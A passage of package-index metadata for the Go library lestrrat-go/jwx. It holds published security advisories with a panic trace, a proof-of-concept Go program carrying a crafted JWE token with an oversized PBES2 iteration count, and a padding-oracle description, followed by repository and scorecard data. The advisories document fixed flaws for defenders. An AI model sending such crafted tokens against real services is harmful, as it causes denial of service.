+0x3e\nencoding/json.(*decodeState).unmarshal(0xc0000ea028, {0x64fa60?, 0xc0000a2140?})\n        /usr/local/go/src/encoding/json/decode.go:181 +0x133\nencoding/json.(*Decoder).Decode(0xc0000ea000, {0x64fa60, 0xc0000a2140})\n        /usr/local/go/src/encoding/json/stream.go:73 +0x179\ngithub.com/lestrrat-go/jwx/v2/internal/json.Unmarshal({0xc00001a288, 0x11, 0x11}, {0x64fa60, 0xc0000a2140})\n        /home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/v2@v2.0.18/internal/json/json.go:26 +0x97\ngithub.com/lestrrat-go/jwx/v2/jws.parseJSON({0xc00001a288, 0x11, 0x11})\n        /home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/v2@v2.0.18/jws/jws.go:588 +0x50\ngithub.com/lestrrat-go/jwx/v2/jws.Parse({0xc00001a288, 0x11, 0x11}, {0x0?, 0xc00006e760?, 0x48450f?})\n        /home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/v2@v2.0.18/jws/jws.go:525 +0x89\npoc.TestPOC(0x0?)\n        /home/fredrik/src/jwx_poc/poc_test.go:10 +0x57\ntesting.tRunner(0xc0000e4340, 0x68ef30)\n        /usr/local/go/src/testing/testing.go:1595 +0xff\ncreated by testing.(*T).Run in goroutine 1\n        /usr/local/go/src/testing/testing.go:1648 +0x3ad\nexit status 2\nFAIL    poc     0.005s\n```\n\n### Impact\n\nThe vulnerability can be used to crash / DOS a system doing JWS verification.\n","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2024-01-09T16:18:48.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L","references":["https://github.com/lestrrat-go/jwx/security/advisories/GHSA-pvcr-v8j8-j5q3","https://github.com/lestrrat-go/jwx/commit/0e8802ce6842625845d651456493e7c87625601f","https://github.com/lestrrat-go/jwx/commit/d69a721931a5c48b9850a42404f18e143704adcd","https://nvd.nist.gov/vuln/detail/CVE-2024-21664","https://github.com/lestrrat-go/jwx/commit/8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65","https://github.com/advisories/GHSA-pvcr-v8j8-j5q3"],"source_kind":"github","identifiers":["GHSA-pvcr-v8j8-j5q3","CVE-2024-21664"],"repository_url":"https://github.com/lestrrat-go/jwx","blast_radius":0.0,"created_at":"2024-01-09T17:05:52.411Z","updated_at":"2026-06-13T16:06:18.563Z","epss_percentage":0.00178,"epss_percentile":0.39415,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wdmNyLXY4ajgtajVxM84AA4So","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1wdmNyLXY4ajgtajVxM84AA4So","packages":[{"ecosystem":"go","package_name":"github.com/lestrrat-go/jwx","versions":[{"first_patched_version":"1.2.28","vulnerable_version_range":"\u003e= 1.0.8, \u003c 1.2.28"}],"purl":"pkg:go/github.com%2Flestrrat-go%2Fjwx"},{"ecosystem":"go","package_name":"github.com/lestrrat-go/jwx/v2","versions":[{"first_patched_version":"2.0.19","vulnerable_version_range":"\u003c 2.0.19"}],"purl":"pkg:go/github.com%2Flestrrat-go%2Fjwx%2Fv2"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wdmNyLXY4ajgtajVxM84AA4So/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03Zjl4LWd3ODUtOGdyZs4AA3lA","url":"https://github.com/advisories/GHSA-7f9x-gw85-8grf","title":"lestrrat-go/jwx's malicious parameters in JWE can cause a DOS","description":"### Summary\ntoo high p2c parameter in JWE's alg PBES2-* could lead to a DOS attack\n\n### Details\nThe JWE key management algorithms based on PBKDF2 require a JOSE Header Parameter called p2c (PBES2 Count). This parameter dictates the number of PBKDF2 iterations needed to derive a CEK wrapping key. Its primary purpose is to intentionally slow down the key derivation function, making password brute-force and dictionary attacks more resource- intensive.\nTherefore, if an attacker sets the p2c parameter in JWE to a very large number, it can cause a lot of computational consumption, resulting in a DOS attack\n\n### PoC\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/lestrrat-go/jwx/v2/jwa\"\n\t\"github.com/lestrrat-go/jwx/v2/jwe\"\n\t\"github.com/lestrrat-go/jwx/v2/jwk\"\n)\n\nfunc main() {\n\ttoken := []byte(\"eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMjU2R0NNIiwicDJjIjoyMDAwMDAwMDAwLCJwMnMiOiJNNzczSnlmV2xlX2FsSXNrc0NOTU9BIn0=.S8B1kXdIR7BM6i_TaGsgqEOxU-1Sgdakp4mHq7UVhn-_REzOiGz2gg.gU_LfzhBXtQdwYjh.9QUIS-RWkLc.m9TudmzUoCzDhHsGGfzmCA\")\n\tkey, err := jwk.FromRaw([]byte(`abcdefg`))\n\tpayload, err := jwe.Decrypt(token, jwe.WithKey(jwa.PBES2_HS256_A128KW, key))\n\tif err == nil {\n\t\tfmt.Println(string(payload))\n\t}\n}\n\n```\n\n### Impact\nIt's a kind of Dos attack, the user's environment could potentially utilize an excessive amount of CPU resources.\n","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2023-12-05T23:29:26.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","references":["https://github.com/lestrrat-go/jwx/security/advisories/GHSA-7f9x-gw85-8grf","https://nvd.nist.gov/vuln/detail/CVE-2023-49290","https://github.com/lestrrat-go/jwx/commit/64f2a229b8e18605f47361d292b526bdc4aee01c","https://github.com/advisories/GHSA-7f9x-gw85-8grf"],"source_kind":"github","identifiers":["GHSA-7f9x-gw85-8grf","CVE-2023-49290"],"repository_url":"https://github.com/lestrrat-go/jwx","blast_radius":0.0,"created_at":"2023-12-06T00:05:57.535Z","updated_at":"2026-05-28T19:10:01.956Z","epss_percentage":0.00183,"epss_percentile":0.4027,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03Zjl4LWd3ODUtOGdyZs4AA3lA","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03Zjl4LWd3ODUtOGdyZs4AA3lA","packages":[{"ecosystem":"go","package_name":"github.com/lestrrat-go/jwx/v2","versions":[{"first_patched_version":"2.0.18","vulnerable_version_range":"\u003c 2.0.18"}],"purl":"pkg:go/github.com%2Flestrrat-go%2Fjwx%2Fv2"},{"ecosystem":"go","package_name":"github.com/lestrrat-go/jwx","versions":[{"first_patched_version":"1.2.27","vulnerable_version_range":"\u003c 1.2.27"}],"purl":"pkg:go/github.com%2Flestrrat-go%2Fjwx"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03Zjl4LWd3ODUtOGdyZs4AA3lA/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1ybTh2LW14ajMtNXJtcc4AAz3K","url":"https://github.com/advisories/GHSA-rm8v-mxj3-5rmq","title":"github.com/lestrrat-go/jwx vulnerable to Potential Padding Oracle Attack","description":"### Summary\n\nDecrypting AES-CBC encrypted JWE has Potential Padding Oracle Attack Vulnerability.\n\n### Details\n\nOn [v2.0.10](https://github.com/lestrrat-go/jwx/releases/tag/v2.0.10), decrypting AES-CBC encrypted JWE may return an error \"failed to generate plaintext from decrypted blocks: invalid padding\":\n\nhttps://github.com/lestrrat-go/jwx/blob/8840ffd4afc5839f591ff0e9ba9034af52b1643e/jwe/internal/aescbc/aescbc.go#L210-L213\n\nReporting padding error causes [Padding Oracle Attack](https://en.wikipedia.org/wiki/Padding_oracle_attack) Vulnerability.\nRFC 7516 JSON Web Encryption (JWE) says that we **MUST NOT** do this.\n\n\u003e 11.5.  Timing Attacks\n\u003e To mitigate the attacks described in RFC 3218 [RFC3218], the\n\u003e recipient MUST NOT distinguish between format, padding, and length\n\u003e errors of encrypted keys.  It is strongly recommended, in the event\n\u003e of receiving an improperly formatted key, that the recipient\n\u003e substitute a randomly generated CEK and proceed to the next step, to\n\u003e mitigate timing attacks.\n\nIn addition, the time to remove padding depends on the length of the padding.\nIt may leak the length of the padding by Timing Attacks.\n\nhttps://github.com/lestrrat-go/jwx/blob/796b2a9101cf7e7cb66455e4d97f3c158ee10904/jwe/internal/aescbc/aescbc.go#L33-L66\n\nTo mitigate Timing Attacks, it MUST be done in constant time.\n\n### Impact\n\nThe authentication tag is verified, so it is not an immediate attack.\n","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2023-06-14T17:24:36.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://github.com/lestrrat-go/jwx/security/advisories/GHSA-rm8v-mxj3-5rmq","https://github.com/lestrrat-go/jwx/commit/6c41e3822485fc7e11dd70b4b0524b075d66b103","https://github.com/lestrrat-go/jwx/commit/d9ddbc8e5009cfdd8c28413390b67afa7f576dd6","https://github.com/lestrrat-go/jwx/blob/796b2a9101cf7e7cb66455e4d97f3c158ee10904/jwe/internal/aescbc/aescbc.go#L33-L66","https://github.com/lestrrat-go/jwx/blob/8840ffd4afc5839f591ff0e9ba9034af52b1643e/jwe/internal/aescbc/aescbc.go#L210-L213","https://github.com/advisories/GHSA-rm8v-mxj3-5rmq"],"source_kind":"github","identifiers":["GHSA-rm8v-mxj3-5rmq"],"repository_url":"https://github.com/lestrrat-go/jwx","blast_radius":0.0,"created_at":"2023-06-14T18:03:33.328Z","updated_at":"2026-06-03T15:10:10.524Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ybTh2LW14ajMtNXJtcc4AAz3K","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1ybTh2LW14ajMtNXJtcc4AAz3K","packages":[{"ecosystem":"go","package_name":"github.com/lestrrat-go/jwx","versions":[{"first_patched_version":"1.2.26","vulnerable_version_range":"\u003c= 1.2.25"}],"purl":"pkg:go/github.com%2Flestrrat-go%2Fjwx"},{"ecosystem":"go","package_name":"github.com/lestrrat-go/jwx/v2","versions":[{"first_patched_version":"2.0.11","vulnerable_version_range":"\u003c= 2.0.10"}],"purl":"pkg:go/github.com%2Flestrrat-go%2Fjwx%2Fv2"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ybTh2LW14ajMtNXJtcc4AAz3K/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx","docker_dependents_count":852,"docker_downloads_count":1616350690,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":4210415,"name":"github.com/lestrrat-go/jwx/jwk/internal/cmd/genheader","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/jwk/internal/cmd","versions_count":31,"first_release_published_at":"2022-11-19T14:33:35.867Z","latest_release_published_at":"2022-11-19T14:33:35.867Z","latest_release_number":"v1.2.7","last_synced_at":"2026-06-07T05:20:46.422Z","created_at":"2022-04-12T21:12:20.357Z","updated_at":"2026-06-07T05:20:46.423Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/jwk/internal/cmd/genheader","install_command":"go get github.com/lestrrat-go/jwx/jwk/internal/cmd/genheader","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/jwk/internal/cmd/genheader#section-documentation","metadata":{},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"lestrrat-go","name":"lestrrat-go","uuid":"36653903","kind":"organization","description":"@lestrrat 's Go projects","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/36653903?v=4","repositories_count":99,"last_synced_at":"2023-08-07T14:22:53.617Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/lestrrat-go","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-06T19:45:03.488Z","updated_at":"2023-08-07T14:22:54.666Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go/repositories"},"tags":[{"name":"v3.0.13","sha":"163a6e94d45a8f89c7d0e25f30652a95c554bd88","kind":"commit","published_at":"2026-01-12T06:38:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13/manifests"},{"name":"v3.0.12","sha":"987379965645db94a50483d7c21c9358b905469a","kind":"commit","published_at":"2025-10-20T09:17:05.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12/manifests"},{"name":"v3.0.11","sha":"9e9c27a269a1a650e1f666b18946dd1796f84779","kind":"commit","published_at":"2025-09-14T02:50:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11/manifests"},{"name":"v3.0.10","sha":"e14eb9b9730b352cb5f8854bbdf315bb98d1a5e0","kind":"commit","published_at":"2025-08-04T12:36:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10/manifests"},{"name":"v3.0.9","sha":"8babbb1d64fda50d89276b5d52b1a682362334b2","kind":"commit","published_at":"2025-07-31T06:59:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9/manifests"},{"name":"v3.0.8","sha":"7f3caf368dda160290bcc6952b4bfb549e308271","kind":"commit","published_at":"2025-06-27T10:33:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8","manifests_url":"https://re